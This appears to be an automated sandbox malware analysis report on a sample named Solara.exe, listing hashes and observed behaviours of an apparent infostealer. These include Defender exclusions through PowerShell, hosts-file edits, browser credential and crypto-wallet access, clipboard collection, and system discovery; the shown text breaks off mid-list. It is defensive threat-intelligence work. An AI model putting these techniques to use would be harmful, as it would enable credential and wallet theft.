Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
14-11-2024 18:47
Behavioral task
behavioral1
Sample
Solara.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
Solara.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral3
Sample
Solara.exe
Resource
win11-20241007-en
General
-
Target
Solara.exe
-
Size
8.5MB
-
MD5
e2bc46d7bc521a528f31102b4c79327c
-
SHA1
66a7f9eda5b1a4be4cd8df18658fd6d0e885b8a6
-
SHA256
aefc3487d439bd87a9de7e5b25d18ab8839096fa6b08e9192c563c6ec0550292
-
SHA512
080aed5274e3eddd5bc5f8d2b859af20bb281a17d717c418e2f3bb915a5a6f0de1345d56c4cc931a7dd533f8c4cf167c476c73c5228ca3a1ab53ceef424c47ad
-
SSDEEP
196608:pFHYkDwfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jo:BwIHziK1piXLGVE4Ue0VJE
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1520 powershell.exe 3052 powershell.exe 2932 powershell.exe 2264 powershell.exe 2720 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exeBuilt.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Built.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 5 IoCs
Processes:
Built.exeBootstrapperV1.23.exeBuilt.exerar.exeSolara.exepid process 2460 Built.exe 4596 BootstrapperV1.23.exe 4992 Built.exe 2120 rar.exe 916 Solara.exe -
Loads dropped DLL 28 IoCs
Processes:
Built.exeMsiExec.exeMsiExec.exeMsiExec.exepid process 4992 Built.exe 4992 Built.exe 4992 Built.exe 4992 Built.exe 4992 Built.exe 4992 Built.exe 4992 Built.exe 4992 Built.exe 4992 Built.exe 4992 Built.exe 4992 Built.exe 4992 Built.exe 4992 Built.exe 4992 Built.exe 4992 Built.exe 4992 Built.exe 4992 Built.exe 2180 MsiExec.exe 2180 MsiExec.exe 1316 MsiExec.exe 1316 MsiExec.exe 1316 MsiExec.exe 1316 MsiExec.exe 1316 MsiExec.exe 3052 MsiExec.exe 3052 MsiExec.exe 3052 MsiExec.exe 2180 MsiExec.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 1.0.0.1 -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Blocklisted process makes network request 3 IoCs
Processes:
msiexec.exeflow pid process 16 1628 msiexec.exe 17 1628 msiexec.exe 19 1628 msiexec.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2 ip-api.com 8 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 3264 tasklist.exe 2472 tasklist.exe 3804 tasklist.exe 4816 tasklist.exe 4896 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI24602\python313.dll upx behavioral3/memory/4992-52-0x00007FFE85ED0000-0x00007FFE86533000-memory.dmp upx behavioral3/memory/4992-58-0x00007FFE9C350000-0x00007FFE9C377000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI24602\libffi-8.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI24602\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI24602\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI24602\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI24602\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI24602\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI24602\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI24602\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI24602\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI24602\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI24602\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI24602\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI24602\libssl-3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI24602\libcrypto-3.dll upx behavioral3/memory/4992-60-0x00007FFEA19F0000-0x00007FFEA19FF000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI24602\_ctypes.pyd upx behavioral3/memory/4992-82-0x00007FFE9BDC0000-0x00007FFE9BDEB000-memory.dmp upx behavioral3/memory/4992-88-0x00007FFE93080000-0x00007FFE931FF000-memory.dmp upx behavioral3/memory/4992-86-0x00007FFE9B070000-0x00007FFE9B095000-memory.dmp upx behavioral3/memory/4992-84-0x00007FFE9E1E0000-0x00007FFE9E1F9000-memory.dmp upx behavioral3/memory/4992-98-0x00007FFE97F00000-0x00007FFE97FCE000-memory.dmp upx behavioral3/memory/4992-99-0x00007FFE81110000-0x00007FFE81643000-memory.dmp upx behavioral3/memory/4992-97-0x00007FFE9BDB0000-0x00007FFE9BDBD000-memory.dmp upx behavioral3/memory/4992-101-0x00007FFE9AFD0000-0x00007FFE9B004000-memory.dmp upx behavioral3/memory/4992-96-0x00007FFE85ED0000-0x00007FFE86533000-memory.dmp upx behavioral3/memory/4992-90-0x00007FFE9C330000-0x00007FFE9C349000-memory.dmp upx behavioral3/memory/4992-106-0x00007FFE9BDA0000-0x00007FFE9BDAD000-memory.dmp upx behavioral3/memory/4992-108-0x00007FFE97790000-0x00007FFE97843000-memory.dmp upx behavioral3/memory/4992-105-0x00007FFE9C350000-0x00007FFE9C377000-memory.dmp upx behavioral3/memory/4992-103-0x00007FFE9AF00000-0x00007FFE9AF14000-memory.dmp upx behavioral3/memory/4992-131-0x00007FFE9BDC0000-0x00007FFE9BDEB000-memory.dmp upx behavioral3/memory/4992-211-0x00007FFE9B070000-0x00007FFE9B095000-memory.dmp upx behavioral3/memory/4992-288-0x00007FFE93080000-0x00007FFE931FF000-memory.dmp upx behavioral3/memory/4992-301-0x00007FFE9C330000-0x00007FFE9C349000-memory.dmp upx behavioral3/memory/4992-305-0x00007FFE97F00000-0x00007FFE97FCE000-memory.dmp upx behavioral3/memory/4992-307-0x00007FFE81110000-0x00007FFE81643000-memory.dmp upx behavioral3/memory/4992-316-0x00007FFE9AFD0000-0x00007FFE9B004000-memory.dmp upx behavioral3/memory/4992-340-0x00007FFE93080000-0x00007FFE931FF000-memory.dmp upx behavioral3/memory/4992-349-0x00007FFE9AF00000-0x00007FFE9AF14000-memory.dmp upx behavioral3/memory/4992-334-0x00007FFE85ED0000-0x00007FFE86533000-memory.dmp upx behavioral3/memory/4992-379-0x00007FFE85ED0000-0x00007FFE86533000-memory.dmp upx behavioral3/memory/4992-2671-0x00007FFE97790000-0x00007FFE97843000-memory.dmp upx behavioral3/memory/4992-2670-0x00007FFE9BDA0000-0x00007FFE9BDAD000-memory.dmp upx behavioral3/memory/4992-2669-0x00007FFE9AF00000-0x00007FFE9AF14000-memory.dmp upx behavioral3/memory/4992-2681-0x00007FFE97F00000-0x00007FFE97FCE000-memory.dmp upx behavioral3/memory/4992-2680-0x00007FFE9BDB0000-0x00007FFE9BDBD000-memory.dmp upx behavioral3/memory/4992-2679-0x00007FFE9C330000-0x00007FFE9C349000-memory.dmp upx behavioral3/memory/4992-2682-0x00007FFE81110000-0x00007FFE81643000-memory.dmp upx behavioral3/memory/4992-2678-0x00007FFE93080000-0x00007FFE931FF000-memory.dmp upx behavioral3/memory/4992-2677-0x00007FFE9B070000-0x00007FFE9B095000-memory.dmp upx behavioral3/memory/4992-2676-0x00007FFE9E1E0000-0x00007FFE9E1F9000-memory.dmp upx behavioral3/memory/4992-2675-0x00007FFE9BDC0000-0x00007FFE9BDEB000-memory.dmp upx behavioral3/memory/4992-2674-0x00007FFEA19F0000-0x00007FFEA19FF000-memory.dmp upx behavioral3/memory/4992-2673-0x00007FFE9C350000-0x00007FFE9C377000-memory.dmp upx behavioral3/memory/4992-2672-0x00007FFE9AFD0000-0x00007FFE9B004000-memory.dmp upx behavioral3/memory/4992-2657-0x00007FFE85ED0000-0x00007FFE86533000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Program Files\nodejs\node_modules\corepack\shims\yarn.ps1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\socks\typings\index.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-pipeline\node_modules\minipass\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\event-target-shim\dist\event-target-shim.umd.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\aggregate-error\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\socks\typings\common\receivebuffer.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\fs\LICENSE.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\diff\release-notes.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\test.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\common-ancestor-path\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\minimatch\minimatch.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-hook.1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\glob\common.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-search.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\git\lib\revs.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\concat-map\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\npm-normalize-package-bin\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\utils\display.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\which\README.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\make-fetch-happen\lib\fetch.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\diff\lib\convert\xml.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\mkdirp\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\minor.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\x509\asn1\obj.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\path-is-absolute\license msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@isaacs\string-locale-compare\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\types\utility.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\ip\lib\ip.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\common-ancestor-path\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\models\delegations.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\retry\example\stop.js msiexec.exe File created C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarnpkg.cmd msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\base64-js\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\cssesc\bin\cssesc msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\util\oidc.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\qrcode-terminal\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\registry.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-view.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\socks\build\common\util.js.map msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\x509\ext.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\utils\open-url.js msiexec.exe File created C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpm msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\qrcode-terminal\lib\main.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\generator\cmake.py msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man7\developers.7 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\tools\pretty_gyp.py msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\gauge\lib\wide-truncate.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minimatch\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-install-ci-test.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\.flake8 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\lib\safe_format.js msiexec.exe File created C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarnpkg.ps1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\arborist\reify.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\defaults\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\treeverse\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\npm-pick-manifest\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\make-fetch-happen\lib\cache\errors.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\lib\link-bins.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\view.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\supports-color\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-install-ci-test.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\verify.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\debug\src\browser.js msiexec.exe -
Drops file in Windows directory 25 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\MSIB874.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB884.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\e57b395.msi msiexec.exe File created C:\Windows\SystemTemp\~DFC0D4D290860E765D.TMP msiexec.exe File created C:\Windows\Installer\e57b391.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIBE80.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC1EE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDC6E.tmp msiexec.exe File opened for modification C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon msiexec.exe File opened for modification C:\Windows\Installer\MSIDEC1.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF928546C82D9C2B61.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIC20F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE059.tmp msiexec.exe File opened for modification C:\Windows\Installer\e57b391.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DFBFF44CC6848784FA.TMP msiexec.exe File created C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC} msiexec.exe File created C:\Windows\SystemTemp\~DFECB4F1BBA2BDB6C1.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIBF6D.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIB805.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBF5C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDCDC.tmp msiexec.exe File created C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Solara.exeMsiExec.exeMsiExec.exewevtutil.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Solara.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 5048 cmd.exe 2644 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid process 3684 WMIC.exe 4604 WMIC.exe 536 WMIC.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 1580 ipconfig.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies data under HKEY_USERS 3 IoCs
Processes:
msiexec.exedescription ioc process Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe -
Modifies registry class 30 IoCs
Processes:
msiexec.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\corepack msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeRuntime msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductName = "Node.js" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNode = "EnvironmentPath" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNpmModules = "EnvironmentPath" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Version = "303038464" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\PackageName = "node-v18.16.0-x64.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductIcon = "C:\\Windows\\Installer\\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\\NodeIcon" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\npm msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPath msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeEtwSupport = "NodeRuntime" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\DocumentationShortcuts msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\PackageCode = "347C7A52EDBDC9A498427C0BC7ABB536" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Assignment = "1" msiexec.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 25 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeBootstrapperV1.23.exemsiexec.exeSolara.exepid process 2932 powershell.exe 1520 powershell.exe 2932 powershell.exe 1520 powershell.exe 3052 powershell.exe 3052 powershell.exe 2008 powershell.exe 2008 powershell.exe 2008 powershell.exe 2356 powershell.exe 2356 powershell.exe 2356 powershell.exe 2264 powershell.exe 2264 powershell.exe 3696 powershell.exe 3696 powershell.exe 2720 powershell.exe 2720 powershell.exe 2508 powershell.exe 2508 powershell.exe 4596 BootstrapperV1.23.exe 4596 BootstrapperV1.23.exe 1628 msiexec.exe 1628 msiexec.exe 916 Solara.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exepowershell.exepowershell.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 3264 tasklist.exe Token: SeDebugPrivilege 2932 powershell.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeIncreaseQuotaPrivilege 4388 WMIC.exe Token: SeSecurityPrivilege 4388 WMIC.exe Token: SeTakeOwnershipPrivilege 4388 WMIC.exe Token: SeLoadDriverPrivilege 4388 WMIC.exe Token: SeSystemProfilePrivilege 4388 WMIC.exe Token: SeSystemtimePrivilege 4388 WMIC.exe Token: SeProfSingleProcessPrivilege 4388 WMIC.exe Token: SeIncBasePriorityPrivilege 4388 WMIC.exe Token: SeCreatePagefilePrivilege 4388 WMIC.exe Token: SeBackupPrivilege 4388 WMIC.exe Token: SeRestorePrivilege 4388 WMIC.exe Token: SeShutdownPrivilege 4388 WMIC.exe Token: SeDebugPrivilege 4388 WMIC.exe Token: SeSystemEnvironmentPrivilege 4388 WMIC.exe Token: SeRemoteShutdownPrivilege 4388 WMIC.exe Token: SeUndockPrivilege 4388 WMIC.exe Token: SeManageVolumePrivilege 4388 WMIC.exe Token: 33 4388 WMIC.exe Token: 34 4388 WMIC.exe Token: 35 4388 WMIC.exe Token: 36 4388 WMIC.exe Token: SeIncreaseQuotaPrivilege 4388 WMIC.exe Token: SeSecurityPrivilege 4388 WMIC.exe Token: SeTakeOwnershipPrivilege 4388 WMIC.exe Token: SeLoadDriverPrivilege 4388 WMIC.exe Token: SeSystemProfilePrivilege 4388 WMIC.exe Token: SeSystemtimePrivilege 4388 WMIC.exe Token: SeProfSingleProcessPrivilege 4388 WMIC.exe Token: SeIncBasePriorityPrivilege 4388 WMIC.exe Token: SeCreatePagefilePrivilege 4388 WMIC.exe Token: SeBackupPrivilege 4388 WMIC.exe Token: SeRestorePrivilege 4388 WMIC.exe Token: SeShutdownPrivilege 4388 WMIC.exe Token: SeDebugPrivilege 4388 WMIC.exe Token: SeSystemEnvironmentPrivilege 4388 WMIC.exe Token: SeRemoteShutdownPrivilege 4388 WMIC.exe Token: SeUndockPrivilege 4388 WMIC.exe Token: SeManageVolumePrivilege 4388 WMIC.exe Token: 33 4388 WMIC.exe Token: 34 4388 WMIC.exe Token: 35 4388 WMIC.exe Token: 36 4388 WMIC.exe Token: SeIncreaseQuotaPrivilege 3684 WMIC.exe Token: SeSecurityPrivilege 3684 WMIC.exe Token: SeTakeOwnershipPrivilege 3684 WMIC.exe Token: SeLoadDriverPrivilege 3684 WMIC.exe Token: SeSystemProfilePrivilege 3684 WMIC.exe Token: SeSystemtimePrivilege 3684 WMIC.exe Token: SeProfSingleProcessPrivilege 3684 WMIC.exe Token: SeIncBasePriorityPrivilege 3684 WMIC.exe Token: SeCreatePagefilePrivilege 3684 WMIC.exe Token: SeBackupPrivilege 3684 WMIC.exe Token: SeRestorePrivilege 3684 